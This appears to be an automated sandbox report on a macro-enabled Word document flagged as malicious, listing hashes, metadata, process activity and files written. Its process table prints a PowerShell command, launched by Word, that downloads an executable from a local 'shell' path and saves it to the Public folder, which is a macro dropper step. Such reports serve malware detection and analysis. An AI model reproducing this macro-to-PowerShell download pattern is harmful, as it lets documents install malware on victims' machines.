| Field | Value |
|---|---|
| File name | 4404d13d86f8164f1df2f42c1565064d80c12136e4a38d7c84916d66a38b7227.docm |
| Full analysis | https://app.any.run/tasks/b2be85d9-3a09-4646-bd23-611d1d9c409b |
| Verdict | Malicious activity |
| Analysis date | March 21, 2019, 01:44:24 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | |
| Indicators | |
| MIME | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
| File info | Microsoft Word 2007+ |
| MD5 | FAD605D85046CAF60E9C71D177F3481C |
| SHA1 | 1F04242123FB4834168D4E8D3040A2BB9F78FD66 |
| SHA256 | 4404D13D86F8164F1DF2F42C1565064D80C12136E4A38D7C84916D66A38B7227 |
| SSDEEP | 768:kUs79W/0+gXc8UWBnLF3xllN/aOHzosXmV+skVuy7sjQmBPsthfQOD:klW/ngs8UWdBBtaOTo+Gir |
| Extension | Identified type | Score |
|---|---|---|
| .docm | Word Microsoft Office Open XML Format document (with Macro) | 53.6 |
| .docx | Word Microsoft Office Open XML Format document | 24.2 |
| .zip | Open Packaging Conventions container | 18 |
| .zip | ZIP compressed archive | 4.1 |
| Field | Value |
|---|---|
| ZipRequiredVersion | 20 |
| ZipBitFlag | 0x0006 |
| ZipCompression | Deflated |
| ZipModifyDate | 1980:01:01 00:00:00 |
| ZipCRC | 0x2acda017 |
| ZipCompressedSize | 449 |
| ZipUncompressedSize | 2053 |
| ZipFileName | [Content_Types].xml |
| Field | Value |
|---|---|
| Template | Normal |
| TotalEditTime | 1.1 hours |
| Pages | 6 |
| Words | 1053 |
| Characters | 5689 |
| Application | Microsoft Office Word |
| DocSecurity | None |
| Lines | 47 |
| Paragraphs | 13 |
| ScaleCrop | No |
| HeadingPairs | |
| TitlesOfParts | - |
| Company | - |
| LinksUpToDate | No |
| CharactersWithSpaces | 6729 |
| SharedDoc | No |
| HyperlinksChanged | No |
| AppVersion | 16 |
| Keywords | - |
| LastModifiedBy | Bruno Alves |
| RevisionNumber | 16 |
| CreateDate | 2019:03:20 04:38:00Z |
| ModifyDate | 2019:03:20 06:16:00Z |
| Title | - |
| Subject | - |
| Creator | 那是什么 |
| Description | - |
| PID | CMD | Path | Indicators | Parent process |
|---|---|---|---|---|
| 1848 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\4404d13d86f8164f1df2f42c1565064d80c12136e4a38d7c84916d66a38b7227.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
| 3284 | powershell.exe ""Invoke-WebRequest 'http://localhost/shell/TESTE01.exe' -outfile 'C:\Users\Public\sucesso.exe'"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WINWORD.EXE |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 1; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR88CE.tmp.cvr | — | — | — |
| 1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\mso8B40.tmp | — | — | — |
| 3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\LT6N51S0IXVUMXWYO2CM.temp | — | — | — |
| 3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFf9198.TMP | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
| 1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\VBE\MSForms.exd | tlb | 1639C7AA43D044C737E63CA0D7A9434F | 26D98EB09C4E87C6CF0D9E2AAC738CEF65FC80DD249F6C335FFE9CC9197DB3E2 |
| 1848 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$04d13d86f8164f1df2f42c1565064d80c12136e4a38d7c84916d66a38b7227.docm | pgc | FF4AC4C631E503849C2B7A74B4115020 | 1C816821DC685B9B4097E7E1A1AA0C0D6F6C09EAA148D62B610AF835CCBE3F90 |
| 1848 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 598AE5467BBA16A5D71B1F59ACFC28E2 | C5AD99449443DF20D6FFA5205364E42F4788BBDD5E7153ACF63EB3AA95813F95 |
| 3284 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 7100C9D54A32DFE02751A9E1BC41F804 | 80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C |
| Process | Message |
|---|---|
| WINWORD.EXE | Escape: |
| WINWORD.EXE | ÿÿÿÿ |
| WINWORD.EXE | |
| WINWORD.EXE | Escape: |
| WINWORD.EXE | ÿÿÿÿ |
| WINWORD.EXE | |
| WINWORD.EXE | Escape: |
| WINWORD.EXE | ÿÿÿÿ |
| WINWORD.EXE | |